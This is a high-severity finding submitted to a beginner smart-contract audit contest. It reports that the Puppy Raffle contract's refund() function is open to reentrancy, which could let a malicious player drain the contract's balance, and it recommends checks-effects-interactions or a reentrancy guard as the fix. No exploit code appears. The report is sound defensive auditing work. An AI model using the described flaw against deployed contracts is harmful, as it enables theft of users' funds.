First Flight #2: Puppy Raffle
First Flight #2
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

refund() function is vulnerable to re-entrancy attack

Heba

Summary

PuppyRaffle.sol::refund() function is vulnerable to reentrancy through sendValue()

Vulnerability Details

PuppyRaffle.sol::refund() function uses openzepplin Address.sol's sendValue() function to refund the calling player, Looking at the docs of this smart contract we see the following warning:

* IMPORTANT: because control is transferred to `recipient`, care must be
* taken to not create reentrancy vulnerabilities. Consider using
* {ReentrancyGuard} or the
* https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].

As refund() does not implement either of those techniques, it is vulnerable to rerentrancy attack.

Impact

A malicious player can use this vulnerability to drain the contract's balance.

Tools Used

manual review

Recommendations

Use -checks-effects-interactions pattern or OZ-ReentrancyGuard to mitigate this risk.
Also, Check the contract balance is > the refund before sending it to the player.

Updates

Lead Judging Commences

Hamiltonite Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

reentrancy-in-refund

reentrancy in refund() function

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.